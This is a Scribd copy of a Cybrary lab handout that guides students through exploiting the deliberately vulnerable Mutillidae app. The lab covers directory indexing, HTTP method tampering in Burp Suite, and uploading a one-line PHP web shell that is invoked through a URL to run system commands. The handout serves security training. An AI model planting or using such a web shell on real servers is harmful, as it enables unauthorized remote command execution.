Scribd
Upload
205 views

Module 7 Security Misconfiguration Lab

This document provides instructions for a security misconfiguration lab. It describes 52 steps to log into a virtual machine, access a vulnerable web application, exploit directory listing, change an HTTP request method, and upload a backdoor PHP file to enable remote command execution. The goal is to identify security flaws like directory indexing, parameter tampering and unrestricted file uploads.

Uploaded by

Taha Khan
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
205 views

Module 7 Security Misconfiguration Lab

This document provides instructions for a security misconfiguration lab. It describes 52 steps to log into a virtual machine, access a vulnerable web application, exploit directory listing, change an HTTP request method, and upload a backdoor PHP file to enable remote command execution. The goal is to identify security flaws like directory indexing, parameter tampering and unrestricted file uploads.

Uploaded by

Taha Khan
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

 

 
 

 
Module 7 Security Misconfiguration Lab

Description: In this lab, you will identify and exploit a security misconfiguration in a Web
application.
Requirements:​ You will need access to the Cybrary lab environment for this lab.

Step 1:​ Log into Cybrary


Step 2:​ Launch the ​OWASP Security Misconfiguration​ lab by searching for it in the
catalog and selecting the launch button
Note: It may take 30-40 seconds for the lab to launch after clicking the button.

Step 3:​ When the lab opens, you will see a pop-up box. Select the Next button, then Ok to
close the pop-up box.
Step 4:​ You will then be taken to the Kali Linux log in screen.
Step 5:​ Enter a username of ​student ​and a password of ​student ​to log into the desktop.
Step 6:​ Next, launch Firefox by clicking on the orange-colored icon near the top-left of the
screen. This will launch the mutillidae page.
Step 7:​ In the URL bar, type the following and press Enter.
http://mutillidae/mutillidae/includes/

Question 1:​ Does it look like directory indexing is allowed? ______________________

Step 8:​ Click the Mutillidae icon at the top-left of the browser to go back to the main
mutillidae page.
Step 9:​ Next, click on OWASP 2017
Step 10:​ Click A6 – Security Misconfiguration
Step 11:​ Click Method Tampering (GET for POST)
Step 12:​ Next, click Poll Question
Step 13:​ You will be taken to the User Poll page.
Step 14:​ Minimize the Firefox window
 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

 
 
 
 

 
Step 15:​ Next, click on the Burp Suite icon on the left-side.
Step 16:​ A pop-up box will open
Step 17:​ Uncheck the “Help improve Burp…” checkbox.
Step 18:​ Click the “I Accept” button to accept the license agreement.
Step 19:​ Click the Next button
Step 20:​ Next, click the Start Burp button
Step 21:​ Next, click the Proxy tab at the top-left
Step 22:​ Next, click the “Intercept is on” button to turn off the intercept.
Step 23:​ Minimize Burp Suite
Step 24:​ Click back on Firefox
Step 25:​ Right-click the FoxyProxy icon to the right of the URL address bar.
Step 26:​ Select the “Use proxies based on pre-defined patterns and priorities.”
Step 27:​ Back on the User Poll page, select kismet and enter anything you want in the
initials box.
Step 28:​ Click the ​Submit Vote​ button.
Step 29:​ Minimize Firefox
Step 30:​ Click back on Burp Suite
Step 31:​ Click on the HTTP History tab at the top-left.
Step 32:​ Next, right-click on the ​http://mutillidae​ and select “Send to Repeater” from the
menu.
Step 33:​ Next, click the ​Repeater ​tab at the top.
Step 34:​ We now see the information from the poll. It was sent to the Web application
using a GET request.
Step 35:​ Now, let’s see if the application allows any request method to be used. We will
change the method to POST.
Step 36:​ On the bottom line, change the “​kismet​” to “​telnet​.”
Step 37:​ Next, change the initials you used before.
Step 38:​ Click the ​Go​ button to send your changes to the server.
Step 39:​ Next, minimize Burp Suite
 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

 
 
 
 

 
Step 40:​ Click back on Firefox
Step 41:​ Select tcpdump and click Submit Vote.

Question 2:Do you see the telnet entry that you submitted via a POST request in Burp Suite?
____________________________________________________________

Step 42:​ Next, we will create and upload a simple backdoor.


Step 43:​ Select OWASP 2017 on the left-side.
Step 44:​ Select A6 – Security Misconfiguration
Step 45:​ Select Unrestricted File Upload
Step 46:​ Next, click Applications at the top-left of the Kali desktop and click on the Terminal
icon to launch the Terminal.
Step 47:​ In the Terminal window, type the following command and press Enter.
echo ‘<?php system($_GET[“cmd”]); ?>’ > Desktop/backdoor.php

Step 48:​ Click back on Firefox


Step 49:​ Click the gray-colored folder icon to the right of the Filename box and select the
backdoor.php​ file for upload.
Step 50:​ Click Open and then click the Upload File button.

Question 3:​ Do you see the file path that the backdoor.php file has been moved to?
_______________________________________________________________

Step 51:​ Next, type the following in the URL bar and press Enter.
http://mutillidae/mutillidae/index.php?page=/tmp/backdoor.php&cmd=id
Step 52:​ Note the “www-data” in the results. This shows that we can run any command by
replacing the “cmd” parameter, which means we can potentially gain full control over the
Web server operating system.

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

 
 
 
 

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

You might also like